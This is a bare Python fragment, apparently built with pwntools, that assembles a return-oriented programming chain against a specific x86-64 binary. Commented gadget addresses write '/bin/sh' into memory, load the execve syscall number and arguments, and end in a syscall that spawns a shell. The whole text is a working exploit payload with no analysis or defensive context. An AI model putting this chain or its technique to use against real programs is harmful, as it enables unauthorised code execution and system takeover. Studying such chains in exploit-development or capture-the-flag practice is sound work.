payload = p64(0x401f10)
#0x0000000000401f10: pop rsi; pop rbp; ret; 
payload += p64(0x10e41000)+p64(0x0)+p64(0x407deb)
# 0x0000000000407deb: lea eax, [rsi + 7]; shr rax, 3; lea rcx, [rsi + 0x3f]; shr rcx, 6; add rax, rsi; lea rax, [rcx + rax + 0xb]; pop rbp; ret; 
payload += p64(0x0)+p64(0x401f10)
# 0x0000000000401f10: pop rsi; pop rbp; ret; 
payload += p64(0x68662f6e69622f)+p64(0x0)+p64(0x406fd0)
# 0x0000000000406fd0: mov qword ptr [rcx + 0x30], rsi; xor eax, eax; pop rbp; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x439070)+p64(0x4285de)
# 0x00000000004285de: pop rdx; ret; 
payload += p64(0x3b)+p64(0x40c3a2)
# 0x000000000040c3a2: mov ecx, edx; mov rax, rcx; ret; 
payload += p64(0x4285de)
# 0x00000000004285de: pop rdx; ret; 
payload += p64(0x0)+p64(0x401f10)
# 0x0000000000401f10: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x420333)
# 0x0000000000420333: syscall; 
payload += b''
